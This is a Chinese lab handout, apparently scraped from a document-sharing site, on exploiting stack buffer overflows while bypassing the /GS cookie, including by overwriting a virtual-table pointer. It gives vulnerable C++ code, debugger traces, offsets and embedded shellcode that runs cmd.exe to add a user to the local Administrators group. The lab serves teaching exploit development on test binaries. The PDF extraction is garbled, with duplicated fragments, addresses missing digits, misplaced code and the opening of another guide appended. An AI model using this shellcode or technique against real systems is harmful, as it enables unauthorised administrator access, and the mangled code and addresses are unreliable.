实验指导书

Size: px

Start display at page:

Download "实验指导书"

佟奈阙
5 years ago
Views:

1 1 实验简介从零开始学习软件漏洞挖掘系列教程第四篇 : 绕过 GS 机制实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过该实验了解绕过 GS 机制的方法, 能够在开启程序 GS 编译的情况下成功利用 3 预备知识 1. 关于 GS 的一些基础知识针对缓冲区溢出覆盖函数返回地址这一特征, 微软在编译程序时候使用了一个很酷的安全编译选项 GS /GS 编译选项会在函数的开头和结尾添加代码来阻止对典型的栈溢出漏洞 ( 字符串缓冲区 ) 的利用当应用程序启动时, 程序的 cookie(4 字节 (dword), 无符号整型 ) 被计算出来 ( 伪随机数 ) 并保存在加载模块的.data 节中, 在函数的开头这个 cookie 被拷贝到栈中, 位于 EBP 和返回地址的正前方 ( 位于返回地址和局部变量的中间 ) [ 局部变量 ][cookie][ 保存的 EBP][ 保存的返回地址 ][ 参数 ] 在函数的结尾处, 程序会把这个 cookie 和保存在.data 节中的 cookie 进行比较如果不相等, 就说明进程栈被破坏, 进程必须被终止 2. 编译选项微软在 VS2003 以后默认启用了 GS 编译选项本文使用 VS2010 GS 编译选项可以通过菜单栏中的项目配置属性 C/C++ -- 代码生成缓冲区安全检查设置开启 GS 或关闭 GS

4 实验环境服务器 :Windows 7 SP1,IP 地址 : 随机分配辅助工具 :Olldbg 调试器,Immunity Debugger,mona.py,windbg. Windbg 是在 windows 平台下, 强大的用户态和内核态调试工具 Immunity Debugger 软件专门用于加速漏洞利用程序的开发, 辅助漏洞挖掘以及恶意软件分析 mona.

2 4 实验环境服务器 :Windows 7 SP1,IP 地址 : 随机分配辅助工具 :Olldbg 调试器,Immunity Debugger,mona.py,windbg. Windbg 是在 windows 平台下, 强大的用户态和内核态调试工具 Immunity Debugger 软件专门用于加速漏洞利用程序的开发, 辅助漏洞挖掘以及恶意软件分析 mona.py 是由 corelan team 整合的一个可以自动构造 Rop Chain 而且集成了 metasploit 计算偏移量功能的强大挖洞辅助插件注本实验成功与否与实验环境, 工具等相关 5 实验步骤我们的任务分为 2 个部分 : 1. 对开启 GS 编译的程序用覆盖返回地址尝试利用它 2. 实战几种绕过 GS 的技术 5.1 实验任务一任务描述 : 对开启 GS 编译的程序尝试覆盖返回地址利用它 1. 为了方便讲解, 我们还是用前面的程序, 并做了一些小小的改变 // test.cpp : 定义控制台应用程序的入口点 // #include "stdafx.h" #include<string.h> #include<windows.h>

3 // 有问题的函数 int test(char *str) { char buffer[8]; // 开辟 8 个字节的局部空间 strcpy(buffer,str); // 复制 str 到 buffer[8], 这里可能会产生栈溢出 return 0; } // 主函数 int main() { LoadLibrary((_T("Netfairy.dll"))); // 载入 Netfairy.dll 模块 char str[30000]="aaaaaaaabbbb\x0f\x10\x02\x50\x31\xd2\xb2\x30\x64\x8b\x1 2\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; // 定义字符数组并赋值 test(str); // 调用 test 函数并传递 str 变量 } return 0; 上面代码关闭 GS 编译选项编译为了方便讲解 GS, 我在编译程序的时候选择了禁用 Rebase( 基址随机化 ),ASLR( 地址随机化 ),SafeSeh( 在链接命令行加入 /SafeSeh:NO 关闭 ),DEP( 代码执行保护 ), 并在 C/C++ -- 优化中选择以禁用, 在 C/C++ -- 常规警告等级中关闭所有警告现在你只需要知道 ASLR,SafeSeh,DEP 也是一些保护措施, 是应用程序更加安全, 但是请放心, 教程的后面我们会看到, 所有的这些在特定的条件下都可以被绕过你可以在 C 盘下找到上面代码 test1.exe 文件, 运行前

4 运行 test1.exe 后可以看到没开启 GS 编译选择前我们的 shellcode 运行良好那么我们开启 GS 编译试试, 你可以在 C 盘找到这个开启 GS 编译生成的的 test2.exe 运行 test2.exe 前

5 运行后

6 可以看到程序报错, 但是 shellcode 没有执行成功, 如果 shellcode 执行了, 应该添加一个新用户接下来我们调试下为何开启 GS 编译后就无法成功利用了还是用 Olldbg 载入程序, 默认情况下断在这里看到了没, 程序在执行前先初始化一个 Cookie 为了证明它 test 函数确实受到了 GS( 安全 Cookie) 保护我们单步到 0x40123C main 函数这里 F7 跟进 main 函数,main 函数全部代码从 0x 到 0x004010C4

7 004010AB. E8 50FFFFFF call test2.test 可以看到在 0x004010AB 处 call test1.test 就是我们的 test 函数了在 0x4010AB 下断点, 直接 F9 来到这里, 然后 F7 跟进去

在 test 函数开始前,1 处的 00401006. A1 00304000 mov eax,dword ptr ds:[ security_cookie] 把之前生成的安全 cookie 复制到 eax 接着 2 处 0040100B.

8 在 test 函数开始前,1 处的 A mov eax,dword ptr ds:[ security_cookie] 把之前生成的安全 cookie 复制到 eax 接着 2 处 B. 33C5 xor eax,ebp 将 eax 和 ebp 异或, 生成新的 cookie, 结果保存到 eax, 下来是 3 处 D FC mov [local.1],eax 把新的 cookie 保存到 local.1 处, 也就是 ebp 上面我们可以看看这个新的 cookie 值是啥, 单步执行到这里 B45 08 mov eax,[arg.1] 看看此时的堆栈

001889F4 585D6618 001889F8 /0018FF44 001889FC 004010B0 返回到 test2.

test 其中 585D6618 就是我们的安全 cookie 了为了看清它是如何保护我们的程序我们单步到 00401051.

9 001889F4 585D F8 /0018FF FC B0 返回到 test2.main+50 来自 test2.test 其中 585D6618 就是我们的安全 cookie 了为了看清它是如何保护我们的程序我们单步到 E8 6F call test. security_check_cookie 继续往下执行, 程序直接终止我们重新载入程序, 来到 0x 处,NOP 掉 0x 这句接着往下执行到 \. C3 retn 注意看此时的堆栈

原来 0x1889FC 保存的返回地址已经被 0x5002100F 覆盖了, 而且 0x5002100F 是 jmp esp 的地址, 我们还可以看到在保存的返回地址的下面就是我们的 shellcode 也就是说程序子返回时会先执行 jmp esp, 然后执行 shellcode 看到开启 GS 和不开 GS 编译的区别了其实开始 GS 编译后会在 test 函数返回前执行 00401051

10 原来 0x1889FC 保存的返回地址已经被 0x F 覆盖了, 而且 0x F 是 jmp esp 的地址, 我们还可以看到在保存的返回地址的下面就是我们的 shellcode 也就是说程序子返回时会先执行 jmp esp, 然后执行 shellcode 看到开启 GS 和不开 GS 编译的区别了其实开始 GS 编译后会在 test 函数返回前执行 E8 7A call test. security_check_cookie 这句代码会比较保存在 data 中的 cookie 和我们堆栈中的 cookie, 如果不一样, 说明发生了栈溢出, 程序直接退出因为我们要覆盖返回地址的话, 必然把堆栈的 cookie 也改变了所以在有 GS 保护的情况下, 我们不能直接覆盖返回地址利用了练习关于 GS 机制, 以下说法正确的是? 单选题 A GS 机制使得我们不能覆盖返回地址 B 如果开启了 GS 编译, 那么所有的函数都受到 GS 保护 C 特定条件下可以通过覆盖虚表指针利用 D GS 彻底摧毁基于栈溢出覆盖返回地址攻击答案 :C 5.2 实验任务二任务描述 : 学习绕过 GS 的办法 1. 通过同时替换栈中和.data 节中的 cookie 来绕过不推荐 2. 利用未被保护的缓冲区来实现绕过 3. 通过猜测 / 计算出 cookie 来绕过不推荐 4. 基于静态 cookie 的绕过如果 cookie 每次都是相同的 5. 覆盖虚表指针推荐, 本文演示这种技术 6. 利用异常处理器绕过推荐, 本文不演示为了演示覆盖虚表指针这种技术, 我将使用下面的代码

11 #include "stdafx.h" #include "windows.h" class TestClass { public: void declspec(noinline) test1(char* src) { char buf[8]; strcpy(buf, src); test2(); // 调用虚函数 test2 } virtual void declspec(noinline) test2() { } }; int main() { char str[8000]; LoadLibrary(_T("Netfairy.dll")); TestClass test; test.test1("aaaabbbbccccddd"); return 0; } 你可以在 C 盘下找到这段代码对应的程序 :test3.exe 注为方便演示, 我关闭了 ASLR,DEP,SafeSeh 编译选项, 在 vs2010 下编译 TestClass 对象在 main 函数的堆栈中分配空间, 并在 main 函数中被调用, 然后对象 test 被做为参数传递给存在漏洞的成员函数 test1( 如果把大于 8 字节的字符串拷贝到 buf,buf 就会被溢出 ) 完成拷贝后, 一个虚函数会被执行, 因为前边的溢出, 堆栈中指向虚函数表的指针可能已经被覆盖, 这样就可以把程序的执行流重定向到 shellcode 中用 Olldbg 载入程序, 查看 test1 函数的代码

test1 函数是受到 GS 保护的函数, 在 00401006 A1 18304000 mov eax, dword ptr ds:[test.

security_check_cookie 进行检验, 如果栈中的 cookie 被覆盖, 那么程序将直接退出但是我们注意到, 在调用校验函数的时候,test1 函数先调用了 test2 函数 00401057 FFD0 call eax ; test.

12 test1 函数是受到 GS 保护的函数, 在 A mov eax, dword ptr ds:[test. security_cookie] B 33C5 xor eax, ebp D 8945 FC mov dword ptr ss:[ebp-4], eax 设置安全 cookie 在 E E call test. security_check_cookie 进行检验, 如果栈中的 cookie 被覆盖, 那么程序将直接退出但是我们注意到, 在调用校验函数的时候,test1 函数先调用了 test2 函数 FFD0 call eax ; test.testclass::test2 而 test2 是虚函数, 所以我们可以覆盖保存在栈中的虚表指针, 间接跳到我们的 shellcode 我们先执行到 B10 mov edx, dword ptr ds:[eax] 观察此时的 eax 为 0x0018FF40, 这个地址保存着虚表指针再执行到 FFD0 call eax ;test.testclass::test2

当输入 AAAABBBBCCCCDDD 时, 刚刚开始覆盖到返回地址如果我们输入很多字符的时候, 多到恰好能覆盖虚表指针那么我们就能控制程序我们可以计算出多少字符能够覆盖到虚表指针 X=0x0018ff40-0x0018dfe4=0x1f60, 十进制就是 8028 我们可以试一下, 把 test.

$dll 就是一个不错的选择很快, 我用 Olldbg 的搜索功能找到了一个 0x500295A2 保存的 0x0018E1E8 指向我们的 AAAAAA 下来我们把虚表指针覆盖为 0x500295A2, 把 8028 个 A 替换为我们的 shellcode, 不足的用 \x90 补充务必记住, 把$

13 当输入 AAAABBBBCCCCDDD 时, 刚刚开始覆盖到返回地址如果我们输入很多字符的时候, 多到恰好能覆盖虚表指针那么我们就能控制程序我们可以计算出多少字符能够覆盖到虚表指针 X=0x0018ff40-0x0018dfe4=0x1f60, 十进制就是 8028 我们可以试一下, 把 test.test1("aaaabbbbccccddd"); 中的 AAAABBBBCCCCDDD 改为 8028 个 A 重新编译, 你可以在 C 盘找到这个文件 :test4.exe, 用 Odlldbg 载入, 执行到 FFD0 call eax 可以看到 8028 个 A 刚好能覆盖到虚表指针接下来就是构造利用了找一个地址, 这个地址保存的值指向我们的 A 我们最好在没有开启 ASLR 的模块找, Netfairy.dll 就是一个不错的选择很快, 我用 Olldbg 的搜索功能找到了一个 0x500295A2 保存的 0x0018E1E8 指向我们的 AAAAAA 下来我们把虚表指针覆盖为 0x500295A2, 把 8028 个 A 替换为我们的 shellcode, 不足的用 \x90 补充务必记住, 把 shellcode 放在 0x0018E1E8 之后, 否则利用失败所以完整的 Exploit 你可以在 C:\ 下的 code.cpp 找到 C:\ 下的 test4.exe 是 code.cpp 编译出来的可执行文件, 运行前

14 运行后

尽管堆栈中的 cookie 被破坏了, 但我们依然劫持了 E I P( 因为我们溢出了虚函数表指针, 并控制了 eax), 从而控制了程序的流程, 执行了我们的 shellcode 5.2.2. 练习以下说法正确的是?

15 尽管堆栈中的 cookie 被破坏了, 但我们依然劫持了 E I P( 因为我们溢出了虚函数表指针, 并控制了 eax), 从而控制了程序的流程, 执行了我们的 shellcode 练习以下说法正确的是? 单选题 A 虚表指针是指向虚函数的指址 B 虚表在创建对象的时候建立 C 本例子也可以覆盖 seh 异常处理利用 D 我们总能通过覆盖虚表指针绕过 GS 机制答案 :C 练习思考题思考如何通过覆盖 SEH 利用这个程序注 : 酌情给分

16 6 配套学习资源网络精灵 - 软件漏洞学习之缓冲区溢出

实验指导书

实验指导书从零开始学习软件漏洞挖掘系列教程第三篇 : 利用 SEH 机制 Exploit it 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科网络 / 信息安全专业相关课程及专业 : 计算机网络, 信息安全实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的在传统的缓冲区溢出中, 我们可以通过覆盖返回地址以跳转到 shellcode 但并不是所有的溢出都是那么简单的